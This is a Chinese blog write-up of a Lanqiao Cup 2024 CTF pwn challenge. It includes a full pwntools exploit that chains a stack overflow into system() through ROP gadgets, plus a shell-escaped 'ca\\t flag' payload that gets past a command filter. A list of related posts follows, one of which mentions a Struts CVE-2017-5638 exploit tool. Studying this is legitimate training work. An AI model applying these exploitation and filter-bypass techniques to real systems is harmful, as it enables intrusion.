[蓝桥杯2024]-PWN:fd解析(命令符转义,标准输出重定向,利用system(‘$0‘)获取shell权限)

已于 2024-04-29 22:42:01 修改
阅读量836 收藏 1
点赞数 3
分类专栏: PWN 文章标签: 蓝桥杯 数据库 sqlserver 网络安全 安全
于 2024-04-27 17:57:02 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_79326813/article/details/138254187
版权

查看保护

查看ida

这里有一次栈溢出,并且题目给了我们system函数。

这里的知识点没有那么复杂

方法一(命令转义):

完整exp:

from pwn import*
p=process('./pwn')
pop_rdi=0x400933
info=0x601090
system=0x400778

payload=b"ca\\t flag 1>&2"
print(len(payload))
payload=payload.ljust(0xe,b'\x00')
p.sendafter(b'restricted stack.',payload)
payload=b'a'*0x28+p64(pop_rdi)+p64(info)+p64(system)
p.sendafter(b'...',payload)
p.interactive()

#补充点1:在第一种方法里&#

最低0.47元/天 解锁文章
超神之路之PWN训练之1之fd
xwjqqqq的博客
12-05 439
环境搭建:拷的学长的ubuntu虚拟机,直接拿过来用了。 训练网址为http://pwnable.kr/play.php。  点开fd,可以看到需通过SSH连接到远程终端做题,命令如下:ssh fd@pwnable.kr -p2222,密码:guest,连接好以后如下图。 通过ls命令可以看到有三个文件,再用ls -al查看文件权限,发现fdfd.c文件都只有读的权限fdfd.
[蓝桥杯2024]-PWN:ezheap解析(堆glibc2.31,glibc2.31下的double free)
2301_79326813的博客
05-03 1053
查看保护查看ida大致就是只能创建0x60大小的堆块,并且uaf只能利用一次。
pwnfd
jxz_dz的博客
10-24 749
最近小伙伴发现了一个学习pwn的网站:http://www.pwnable.kr/。然后想着一块进行,把做过的都记 录下来。那么开始第一个吧! pwn学习的游戏网站 1.点一下fd图片出现: 观察ssh fd@pwnable.kr -p2222(pw:guest),是一条ssh命令。ssh是secure shell通常...
day5——system($0)
m0_73858054的博客
12-01 167
所以,无论是用哪种方式,最终达到的目的都是通过shell来执行特定的命令。但需要注意的是,在某些情况下,我怀疑ret那句话不能加的原因就是在这里,但是我不理解因为加上那句话之后payload的长度刚好满足0x38,很明显没有超过…这是因为两者都会调用系统的shell来执行参数中指定的命令。做这道题的时候他那个read限制读入的长度给我整麻了,虽然这里没啥影响,但是后面还是要注意一下。但是没有‘/bin/sh’字符串,不过在上面名为tips的函数中发现了$0的机器码。哎呀,昨天居然忘了发了,今天先发一下吧。
pwn学习fd
why笑的博客
07-19 411
查看题目 play平台 Mommy! what is a file descriptor in Linux? try to play the wargame your self but if you are ABSOLUTE beginner, follow this tutorial link: https://youtu.be/971eZhMHQQw 看到题目蒙蔽的很,还好下面给了一个ssh的链接和账号可以直接链接查看(这里就不放出来了,大家可以去官网查看哟!) 尝试 链接上ssh之后就可以
ret2text(system($0)
2302_79899078的博客
03-15 974
在正常的编程或系统使用中,system($0)本身并不会直接导致获取任何权限$0是一个特殊的 shell 变量,它代表当前脚本或程序的名字。在 C 语言中,如果你使用system()函数来执行一个 shell 命令,那么传递给system()的字符串会被当作 shell 命令来执行。如果你尝试执行system($0),你实际上是在尝试执行一个名为当前脚本或程序名字的 shell 命令。这通常没有特殊的权限提升效果,除非该名字恰好指向了一个具有特殊权限的脚本或程序。
PWN fd [pwnable.kr]CTF writeup题解系列1
重新启程
01-01 556
题目地址:http://pwnable.kr/play.php 题目地址页面,看看还是挺有意思的,还有一些图片。 看看题目: 题目比较简单,直接把解题过程列出来 root@mypwn:/ctf/work/reverse# ssh fd@pwnable.kr -p2222 The authenticity of host '[pwnable.kr]:2222 ([128.61.24...
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
struts-pwn:Apache Struts CVE-2017-5638的漏洞利用
05-18
Apache Struts CVE-2017-5638的漏洞利用 用法 测试单个URL。 python struts-pwn.py --url 'http://example.com/struts2-showcase/index.action' -c 'id' 测试网址列表。 python struts-pwn.py --list 'urls.txt' ...
[VNCTF2024]-PWN:preinit解析(逆向花指令,绕过strcmp,函数修改,机器码)
2301_79326813的博客
02-29 2784
这边其实看反汇编没啥大作用,需要自己动调。但是前面的绕过strcmp还是要看一下的。
pwnable学习笔记-fd
网安星空
12-19 1507
pwn靶场,可供对pwn有兴趣的人和pwn初级人员练手
PWN · 总结】system返回shell(‘/bin/sh‘、‘sh‘、$(0))
Mr_Fmnwon的博客
05-31 5362
pwn题中要通过system/excute等返回shell,进而cat flag。今天遇到一题,参数$(0)也可返回,有必要记录一下。
2024---第十五届蓝桥杯网络安全CTF赛道Writeup(Web、Misc、Crypto、Reverse、Pwn)
最新发布
web15085181368的博客
12-10 6273
在他的程序中,他没有正确释放动态分配的内存空间,并且在之后继续使用了已经释放的指针,造成了悬空指针的问题。你能找到该漏洞并利用成功吗?所以我们要把他俩的乘积开根号得到的结果一定是在p,q之间的一个数字,(而且一定不是素数,因为p,q就是紧邻的两个素数)。小兰同学在开发网站时了解到一个爬虫协议,该协议指网站可建立一个特别的txt文件来告诉搜索引擎哪些页面可以抓取,哪些不可以抓取,而搜索引擎则通过读取该txt文件来识别这个页面是否允许被抓取,爬虫协议并不是一个规范而只是约定俗成的,所以不能保证网站的隐私。
乱七八糟的pwn入门(二)——1.fd
Z_Pathon的博客
08-06 752
审题 环境配好了,要开始做第一道题了,好激动。让我们打开pwnable.kr,看第一道题。 第一题的题目如下: 小学养成的好习惯,先审题。可以看到,题目上问,linux的“file descriptor”是啥? 是啥?俺也不知道,俺也不想问。这个时候先查资料有点无聊,又看到最下面给了一行命令: ssh fd@pwnable.kr -p2222 ...
pwn学习:pwnable.kr fd
Richard_pl的博客
03-11 483
Day 1: Study pwn via pwnable.kr——fd 写在前面: 记录自己的学习过程,从零开始。。。 首先ssh连接远程主机 查看文件相关权限 从第一个文件可以看出,文件由fd_pwn所有,同属于fd组。字节大小为7322,创建时间Jun 11 2014(看来已经创建好久了。。),文件名fd。 最重要的就是文件的访问权限了,-r-sr-x–表示文件所有者拥有读文件的权限,f...
python 重定向 ctf_CTF常用python库PwnTools的使用学习
weixin_39918145的博客
12-10 322
之前主要是使用zio库,对pwntools的了解仅限于DynELF,以为zio就可以取代pwntools。后来发现pwntools有很多的高级用法都不曾听说过,这次学习一下用法,希望可以在以后的exp编写中能提供效率。PwnTools的官网如下:http://pwntools.com/安装方法是使用pip命令,pip install pwn。这样就可以安装上pwn库了。使用时用from pwn i...
bugku pwn4 学习
欢迎来到神林的博客
08-27 1334
2019-08-25 bugku pwn4 学习 1.拿到题目先file 一下文件看看文件属性 查看得知是64位动态链接库的文件。2.checksec 查看是否开启什么保护然而并没有什么保护PIE 保护指定是对代码段进行保护3.IDA查看内容 看到了敏感函数system,看着想办法跳转4.查看main函数,有栈溢出的敏感函数 read 想办法利用read 函数5.查看read函数栈中内容 完全能够...
ctf-pwn--调试
xy_369的博客
05-20 622
写这篇文章的目的是更好地去理解堆,不要只停留在理论知识阶段注:读这篇文章需要一定基础,不然读起来很费劲或读不懂,要是有ctf-pwn手的基本基础,只是缺乏堆这一块的知识,可以先把这篇文章读完,大致了解哪些地方写了哪些知识点,同时结合一些堆相关的链接去快速掌握堆在计算机内存中的运作方式。
2024蓝桥杯初赛决赛pwn题全解
cainiao78777的博客
06-04 1789
蓝桥杯pwn全解
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值